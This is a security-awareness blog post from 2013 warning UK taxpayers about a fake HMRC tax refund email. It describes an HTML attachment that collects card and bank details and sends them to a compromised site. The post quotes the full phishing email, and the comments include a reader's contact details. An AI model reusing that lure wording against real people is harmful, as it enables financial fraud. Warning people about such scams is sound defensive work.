Categories

Fraud/Scam Alert

Fake HMRC Tax Refund Mail Goes Phishing

If you pay taxes in the UK, please be aware that scammers are currently sending fake HMRC tax refund attachments via email. Here’s the email complete with attachment:

Fake HMRC tax refund

The text reads as follows:

—–Original Message—–
From: HM Revenue & Customs [mailto:refund-taxAT@hmrc.gov.uk]
Sent: 09 December 2013 21:18
To: UK321712AThmrc.gov.co.uk.com
Subject: Submit Your Tax Refund

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application.
In order to process your refund you will need to complete the attached application form.
Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
– open it in a browser
– follow the instructions on your screen

Regards,
HM Revenue & Customs

This is, of course, complete nonsense. The attachment is a slice of HTML designed to open in a web browser. With Javascript active, the scam can work some magic on unsuspecting victims.

Fake refund attachment

The info requested from the scammers includes full name, address, date of birth, card number, sort code, account number, telephone, verification code and more.

Once the victim has filled everything in, they’re encouraged to press the “Submit informations” button. One would hope the typo would be enough to raise suspicion in some, but of course it won’t save everybody.

The scammers here are really quite precise with regards the information they’re after. Make a mistake, leave a section blank or type something not to their liking, and…

Oops

The form does this for everything – type more or less than a 16 digit credit card number, and it’ll tell you to go back and fix it. Place letters into the phone number? You’ll have to go back and fix it.  Make a mess of the sort code / account number? You’ll have to….you guessed it…..go back and fix it.

Here’s the full list of “You’ve been a very naughty boy” from the code:

Sir, yes Sir

Hitting the submit button sends the information via form to a .biz URL which appears to be compromised.

HMRC have some advice for those unlucky enough to be sent a phishing mail on their Reporting a Phish page. The golden rule:

  • HM Revenue & Customs (HMRC) will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.

Scammers will often send victims malware attachments instead of a phishing mail, so it pays twice over to steer clear of random tax refund emails.

A few weeks before the holidays begin is not a good time to have your bank account cleaned out by a tax phish Scrooge.

Christopher Boyd (Thanks to Dom for sending this over)


  • https://www.facebook.com/carmella.smith.1232 Carmella Smith

    Hello Malwarebytes,
    Your product is fantastic. Alas, I seem to have gotten a virus not yet detected by your free version. It uses apaqz.exe, I see boatloads of traffic seen in httpanalyzer even when no browser is open. Opening IE gets many new tabs with advertising in them. Removing registry entries or changing the value does not help; they come back. Registry entry key may be Xyfeokxe or Okwucyip. Would you like more information about the registry entries? Anything else I can provide? Thanks so much for considering it.

  • https://www.facebook.com/carmella.smith.1232 Carmella Smith

    I’m at csmith@iii.com, or 510 450-6363 x4220. Thanks so much.

  • Pingback: W-4 TAX FORM 2014

  • Pingback: A Familiar Phish Preludes The New Tax Season | Malwarebytes Unpacked

  • Pingback: A Familiar Phish Preludes Tax Season |Nampa Computer Repair

Subscribe to our YouTube Channel